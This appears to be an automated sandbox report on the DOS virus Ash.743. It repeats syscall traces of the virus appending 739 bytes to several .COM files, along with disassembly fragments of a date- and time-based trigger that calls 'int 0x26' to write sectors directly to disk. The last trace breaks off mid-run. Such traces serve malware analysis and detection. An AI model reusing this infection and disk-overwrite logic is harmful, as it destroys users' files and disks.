Sample viewer

vx.netlux.org/Virus.DOS.Ash.743.k

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:34:01.764625248Z 26 PC: f835 | Set disk transfer address
2018-12-17T22:34:01.766278464Z 78 PC: f88b | Find first file
2018-12-17T22:34:01.773719856Z 61 PC: f897 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:34:01.781130283Z 63 PC: f8a6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:34:01.788651494Z 66 PC: f8bd | Move file pointer
2018-12-17T22:34:01.791574354Z 64 PC: f8d1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:01.795013107Z 64 PC: f8dc | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:34:01.812856035Z 66 PC: f8e5 | Move file pointer
2018-12-17T22:34:01.816017128Z 64 PC: f903 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:01.824185193Z 62 PC: f87f | Close file
2018-12-17T22:34:01.834071727Z 79 PC: f88b | Find next file
2018-12-17T22:34:01.837913715Z 61 PC: f897 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:34:01.84548746Z 63 PC: f8a6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:34:01.852839817Z 66 PC: f8bd | Move file pointer
2018-12-17T22:34:01.855618644Z 64 PC: f8d1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:01.859866525Z 64 PC: f8dc | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:34:01.8695842Z 66 PC: f8e5 | Move file pointer
2018-12-17T22:34:01.872222055Z 64 PC: f903 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:01.881346121Z 62 PC: f87f | Close file
2018-12-17T22:34:01.890788365Z 79 PC: f88b | Find next file
2018-12-17T22:34:01.893716328Z 61 PC: f897 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:34:01.901928051Z 63 PC: f8a6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:34:01.909039105Z 66 PC: f8bd | Move file pointer
2018-12-17T22:34:01.910454532Z 64 PC: f8d1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:01.913817019Z 64 PC: f8dc | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:34:01.92254981Z 66 PC: f8e5 | Move file pointer
2018-12-17T22:34:01.924816154Z 64 PC: f903 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:01.933522176Z 62 PC: f87f | Close file
2018-12-17T22:34:01.943620301Z 79 PC: f88b | Find next file
2018-12-17T22:34:01.946542353Z 61 PC: f897 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:34:01.954363678Z 63 PC: f8a6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:34:01.961411763Z 66 PC: f8bd | Move file pointer
2018-12-17T22:34:01.962888345Z 64 PC: f8d1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:01.966745292Z 64 PC: f8dc | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:34:01.976443627Z 66 PC: f8e5 | Move file pointer
2018-12-17T22:34:01.978070613Z 64 PC: f903 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:01.985501556Z 62 PC: f87f | Close file
2018-12-17T22:34:01.994930933Z 79 PC: f88b | Find next file
2018-12-17T22:34:01.998158317Z 61 PC: f897 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:34:02.006577071Z 63 PC: f8a6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:34:02.014476908Z 66 PC: f8bd | Move file pointer
2018-12-17T22:34:02.01620441Z 64 PC: f8d1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:02.019269215Z 64 PC: f8dc | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:34:02.029532636Z 66 PC: f8e5 | Move file pointer
2018-12-17T22:34:02.031513157Z 64 PC: f903 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:02.043152399Z 62 PC: f87f | Close file
2018-12-17T22:34:02.054070409Z 79 PC: f88b | Find next file
2018-12-17T22:34:02.057393136Z 61 PC: f897 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:34:02.065410566Z 63 PC: f8a6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:34:02.074718222Z 66 PC: f8bd | Move file pointer
2018-12-17T22:34:02.076740206Z 64 PC: f8d1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:02.080205682Z 64 PC: f8dc | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:34:02.090557775Z 66 PC: f8e5 | Move file pointer
2018-12-17T22:34:02.093151949Z 64 PC: f903 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:02.100291659Z 62 PC: f87f | Close file
2018-12-17T22:34:02.109738856Z 79 PC: f88b | Find next file
2018-12-17T22:34:02.11414352Z 61 PC: f897 | Open file (Filename = 'PAH.COM')
2018-12-17T22:34:02.121670916Z 63 PC: f8a6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:34:02.127891908Z 66 PC: f8bd | Move file pointer
2018-12-17T22:34:02.130467436Z 64 PC: f8d1 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:02.133691106Z 64 PC: f8dc | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:34:02.1431446Z 66 PC: f8e5 | Move file pointer
2018-12-17T22:34:02.144975884Z 64 PC: f903 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:34:02.152094065Z 62 PC: f87f | Close file
2018-12-17T22:34:02.161177125Z 79 PC: f88b | Find next file
2018-12-17T22:34:02.16506011Z 42 PC: f931 | Get date 0xf931: cmp dl, 4
0xf934: jne 0xf940
0xf936: cmp dh, 7
0xf939: jne 0xf940
0xf93b: xor ax, ax
0xf93d: jmp 0xf95e
0xf93f: nop
0xf940: mov ah, 0x2c
0xf942: int 0x21
0xf944: or cl, cl
0xf946: jne 0xf96b
0xf948: cmp ch, 6
0xf94b: jge 0xf96b
0xf94d: add cl, ch
0xf94f: mov ax, cx
0xf951: cwde
0xf952: add al, dh
0xf954: adc al, dl
0xf956: adc ah, 0
0xf959: or ax, ax
2018-12-17T22:34:02.167551984Z 44 PC: f944 | Get time 0xf944: or cl, cl
0xf946: jne 0xf96b
0xf948: cmp ch, 6
0xf94b: jge 0xf96b
0xf94d: add cl, ch
0xf94f: mov ax, cx
0xf951: cwde
0xf952: add al, dh
0xf954: adc al, dl
0xf956: adc ah, 0
0xf959: or ax, ax
0xf95b: jne 0xf95e
0xf95d: inc ax
0xf95e: mov dx, ax
0xf960: mov cx, 1
0xf963: xor bx, bx
0xf965: mov ah, 0x19
0xf967: int 0x21
0xf969: int 0x26
0xf96b: mov bx, 0x31a
2018-12-17T22:34:02.169956913Z 44 PC: f972 | Get time 0xf972: inc dh
0xf974: cmp dh, byte ptr [0x319]
0xf978: jl 0xf980
0xf97a: sub dh, byte ptr [0x319]
0xf97e: jmp 0xf974
0xf980: mov al, dh
0xf982: mov cl, al
0xf984: cwde
0xf985: shl ax, 1
0xf987: add bx, ax
0xf989: mov si, word ptr [bx]
0xf98b: mov ch, byte ptr [si - 1]
0xf98e: mov dx, si
0xf990: mov ah, 9
0xf992: int 0x21
0xf994: cmp ch, 0
0xf997: jne 0xf99b
0xf999: int 0x20
0xf99b: cmp ch, 1
0xf99e: jne 0xf9a1
2018-12-17T22:34:02.173124568Z 9 PC: f994 | Display string (Could not find end pointer)
2018-12-17T22:34:02.177557415Z 26 PC: f849 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:30.032693215Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:30.034538261Z 78 PC: 12afb | Find first file
2018-12-25T11:58:30.040947772Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:30.047218288Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:30.054245264Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:30.056329266Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:30.058999571Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:30.073242131Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:30.075412919Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:30.081952091Z 62 PC: 12aef | Close file
2018-12-25T11:58:30.089947786Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.093466525Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.09980998Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.106349985Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.10838961Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.112820623Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.120909419Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.122499156Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.131104892Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.139275463Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.142211168Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.149740664Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.156415098Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.158184363Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.161986676Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.170165059Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.17187156Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.180208467Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.188242594Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.190846855Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.197835206Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.204220657Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.205750368Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.209503931Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.217493224Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.218937607Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.22679703Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.235056811Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.237677818Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.244929921Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.25181472Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.253254367Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.25715632Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.265308238Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.266615411Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.275483131Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.283724611Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.286619619Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.293955304Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.300819616Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.302444484Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.305407468Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.314619384Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.316026925Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.322489292Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.331219626Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.333960982Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.340498061Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.346943481Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.348147582Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.350255057Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.355388467Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.356598995Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.362907537Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.368582723Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.370322612Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:30.371934438Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:30.373872364Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:30.165868373Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:30.167727346Z 78 PC: 12afb | Find first file
2018-12-25T11:58:30.174178052Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:30.181136465Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:30.18868639Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:30.190384122Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:30.193546173Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:30.21045968Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:30.212207209Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:30.216445707Z 62 PC: 12aef | Close file
2018-12-25T11:58:30.223345932Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.226889694Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.234784383Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.242483235Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.244924886Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.248133557Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.257001373Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.259472959Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.266749161Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.275924235Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.279306423Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.286651318Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.293734673Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.296472496Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.299446635Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.309151415Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.316201026Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.323798309Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.332896233Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.335773542Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.34329107Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.347861099Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.349234941Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.352672011Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.361513843Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.363011164Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.36987067Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.385769662Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.389124505Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.397844279Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.40529895Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.406989614Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.410735611Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.419837206Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.421547665Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.429954639Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.439417728Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.442433608Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.449828475Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.458164603Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.460212507Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.463265519Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.474385658Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.476033797Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.48391385Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.494829314Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.498198739Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.506085702Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.514806978Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.516625889Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.52062724Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.530388688Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.532310709Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.53983654Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.550071568Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.553104682Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:30.555895077Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:30.558491803Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:30.282644796Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:30.284159931Z 78 PC: 12afb | Find first file
2018-12-25T11:58:30.291072561Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:30.298410069Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:30.305658905Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:30.307354345Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:30.310167501Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:30.325412823Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:30.32719149Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:30.334417686Z 62 PC: 12aef | Close file
2018-12-25T11:58:30.343171383Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.346471709Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.354913021Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.362358872Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.364855011Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.369527602Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.378977487Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.381424186Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.389125418Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.39871967Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.402576198Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.409901663Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.417639667Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.419594834Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.422772004Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.431608177Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.43303352Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.440523052Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.4493148Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.452241474Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.460564727Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.467739823Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.469078182Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.472282138Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.481449651Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.482920518Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.490599668Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.499671558Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.503025122Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.510552567Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.51819731Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.519651606Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.522961658Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.531727761Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.533171371Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.542110528Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.551277598Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.55408365Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.561390236Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.568769041Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.570415216Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.573672374Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.584626373Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.586534023Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.594411697Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.604661598Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.608851116Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.616548311Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.624924442Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.626552135Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.629639961Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.6390933Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.640584348Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.647809366Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.657511357Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.660626809Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:30.66346431Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:30.666804844Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6089,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:30.776194576Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T11:58:30.777905523Z 78 PC: 12afb | Find first file
2018-12-25T11:58:30.785545686Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:30.793354507Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:30.806117245Z 66 PC: 12b2d | Move file pointer
2018-12-25T11:58:30.808556142Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:30.811546493Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:58:30.82742833Z 66 PC: 12b55 | Move file pointer
2018-12-25T11:58:30.829814765Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:30.83748372Z 62 PC: 12aef | Close file
2018-12-25T11:58:30.847074604Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.851756847Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:30.859112204Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:30.866196813Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:30.868466611Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:30.871409704Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:30.880352144Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:30.881682675Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:30.889470206Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:30.899539529Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:30.902941319Z 61 PC: 12b07 | Open file (See above)
